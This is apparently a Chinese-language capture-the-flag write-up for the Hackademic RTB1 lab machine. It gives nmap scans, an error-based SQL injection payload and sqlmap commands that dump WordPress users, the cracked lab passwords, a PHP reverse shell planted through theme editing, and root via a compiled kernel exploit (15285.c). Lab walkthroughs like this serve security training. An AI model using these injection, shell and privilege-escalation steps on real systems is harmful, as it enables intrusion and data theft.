靶机下载地址
信息收集
主机探测
sudo nmap -sn 10.10.10.0/24
获取靶机IP地址10.10.10.10
初步扫描
sudo nmap -sT --min-rate 10000 -p- 10.10.10.10
可知80端口开放
80/tcp open http
详细信息扫描
sudo nmap -sT -sC -sV -O -p 22,80 10.10.10.10
可知80端口版本信息
80/tcp open http Apache httpd 2.2.15 ((Fedora))
漏洞脚本扫描
sudo nmap -sT --script=vuln -p 22,80 10.10.10.10
都是DOS攻击,优先级靠后
UDP扫描
sudo nmap -sU --top-ports 100 10.10.10.10
无有效信息
WEB指纹识别
访问80端口,看源代码发现使用了wordpress CMS 版本号1.5.1.1
漏洞发现
SQL注入
在URL输入引号,发现报错,有报错信息,存在SQL注入点,可尝试报错注入。
http://10.10.10.10/Hackademic_RTB1/?cat=1%27
构造payload
http://10.10.10.10/Hackademic_RTB1/?cat=1||extractvalue(1,concat(0x7e,version()))#
成功获取数据库版本号
漏洞利用
数据库爆破
使用SQLMAP爆破数据库
sudo sqlmap -u "10.10.10.10/Hackademic_RTB1/?cat=1" --level 5 --risk 3 --dbs --batch
sudo sqlmap -u "10.10.10.10/Hackademic_RTB1/?cat=1" --level 5 --risk 3 -D wordpress -T wp_users --dump
成功获得以下用户名和密码(已经破解过了)
NickJames admin
JohnSmith PUPPIES
GeorgeMiller q1w2e3
TonyBlack napoleon
JasonKonnors maxwell
MaxBucky kernel
后台登陆
目录扫描得到wordpress登录页面
使用GeorgeMiller q1w2e3登录后台(其它用户也可以登录,但是没有主题和插件管理)
反弹shell
修改一个php文件为反弹shell,攻击机开启监听。
访问得到反弹shell
权限提升
查看系统版本号比较老,可使用系统漏洞提权.
PS:虽然能得到mysql的root账户密码并且secure_file_priv为空并且存在plugin目录,但是mysql不是root身份运行无法UDF提权。无sudo权限,无SUID,无计划任务,暂时没发现其它提权漏洞可利用。
查看当前Linux版本存在的提权漏洞,使用15285.c
searchsploit Linux 2.6.3 |grep 'Escalation'
传文件编译运行,成功获取root权限
文件放在/tmp目录下
gcc -m32 15285.c -o shit
chmod 777 shit
./shit
总结
信息收集知道使用了wordpressCMS,通过SQL注入得到后台登录的users表,登录后台通过主题文件修改得到反弹shell,最后利用系统漏洞提权,总体来说靶机难度很简单。